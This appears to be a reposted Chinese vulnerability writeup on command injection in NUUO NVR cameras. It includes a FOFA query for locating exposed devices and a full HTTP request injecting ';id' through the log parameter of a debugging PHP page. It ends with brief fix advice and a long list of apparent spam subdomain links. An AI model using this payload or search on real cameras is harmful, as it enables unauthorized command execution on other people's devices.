当前位置: 首页 > news >正文

NUUO摄像头debugging_center_utils命令执行漏洞

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

NUUO NVR是中国台湾省NUUO公司旗下的一款网络视频记录器,该设备存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,进而获取服务器的权限。

搜索语法 

FOFA:title="Network Video Recorder Login "

漏洞再现

GET /__debugging_center_utils___.php?log=;id HTTP/1.1

Host: 

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

 

修复建议

1、禁⽌公⽹访问该系统。
2、及时升级产品到最新版本。


文章转载自:
http://antismoking.wjrtg.cn
http://ark.wjrtg.cn
http://baaroque.wjrtg.cn
http://antiphonic.wjrtg.cn
http://accept.wjrtg.cn
http://boatel.wjrtg.cn
http://calcite.wjrtg.cn
http://chalkboard.wjrtg.cn
http://apec.wjrtg.cn
http://atopy.wjrtg.cn
http://assonant.wjrtg.cn
http://befuddle.wjrtg.cn
http://anlistatig.wjrtg.cn
http://batumi.wjrtg.cn
http://chaos.wjrtg.cn
http://amrita.wjrtg.cn
http://araeostyle.wjrtg.cn
http://anisomerous.wjrtg.cn
http://alack.wjrtg.cn
http://bench.wjrtg.cn
http://actinodermatitis.wjrtg.cn
http://caballo.wjrtg.cn
http://bondman.wjrtg.cn
http://blemish.wjrtg.cn
http://altarpiece.wjrtg.cn
http://archaeozoic.wjrtg.cn
http://banjax.wjrtg.cn
http://cavelike.wjrtg.cn
http://airframe.wjrtg.cn
http://banditti.wjrtg.cn
http://www.dtcms.com/a/100445.html

相关文章:

  • JS 生成批量投入数据用的csv文件
  • 是否每一层之间都要线性变换和激活函数?
  • 记一次snmp_exporter/generator生成yml报错问题修复
  • 【小兔鲜】day01 项目、Vue3介绍、组合式API、小案例
  • [python]minepy安装后测试代码
  • cpp栈操作
  • 计算机网络相关知识小结
  • 笔记 数字电路与计算机组成
  • 祥瑞金业:如果美股进入熊市,黄金会如何反应?
  • 基于Linux C++多线程服务器 + Qt上位机开发 + STM32 + 8266WIFI的智慧无人超市
  • .net GRPC服务搭建,跨进程调用。C#应用和Python应用之间的通信。
  • Chapter 9 Capacitive DC–DC Converters
  • 百度自动驾驶:我的学习笔记
  • Epub转PDF软件Calibre电子书管理软件
  • 3.3 元组
  • (四)队列族
  • Unity声音管理系统笔记
  • 【JavaScript】合体期功法——DOM(二)
  • Unidbg Trace 反 OLLVM 控制流平坦化(fla)
  • Linux命令-sed指令
  • notion访问慢notion卡顿怎么办,提升notion加载速度
  • Java全栈面试宝典:线程机制与Spring依赖注入深度解析
  • 图解AUTOSAR_SWS_TimeService
  • Oracle数据库数据编程SQL<递归函数详解>
  • Linux之权限问题
  • 2025普通话考试(最新)| 普通话软件 + 真题 + 测试
  • Python第六章20:函数的参数传递和匿名函数
  • NQA 网络质量分析协议
  • 哈希表 - 两个数组的交集(集合、数组) - JS
  • 华为hcia——Datacom实验指南——配置OSPF路由